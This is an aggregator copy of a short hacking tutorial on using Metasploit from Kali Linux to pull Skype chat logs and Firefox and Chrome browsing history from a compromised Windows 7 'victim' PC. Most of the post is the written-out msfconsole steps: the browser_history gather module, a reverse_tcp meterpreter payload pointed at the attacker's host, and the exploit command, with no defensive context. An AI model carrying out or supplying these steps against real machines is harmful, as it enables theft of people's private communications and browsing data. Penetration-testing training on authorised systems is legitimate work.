Quantcast
Channel: Penetration Testing Archives - Hacking Articles
Viewing all articles
Browse latest Browse all 812

How to Gather Skype Logs, Firefox History and Chrome history of Remote Victim PC

$
0
0

Gathers Skype chat logs, Firefox history, and Chrome history data from the target machine.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)

Open Kali terminal type msfconsole

Now type use exploit/windows/gather/forensics/browser_history

msf exploit (browser_history)>set payload windows/meterpreter/reverse_tcp

msf exploit (browser_history)>set lhost 192.168.1.6 (IP of Local Host)

msf exploit (browser_history)>set session 1

msf exploit (browser_history)>exploit

All History Files saved in /root/.msf4/local/ Directory


Viewing all articles
Browse latest Browse all 812

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>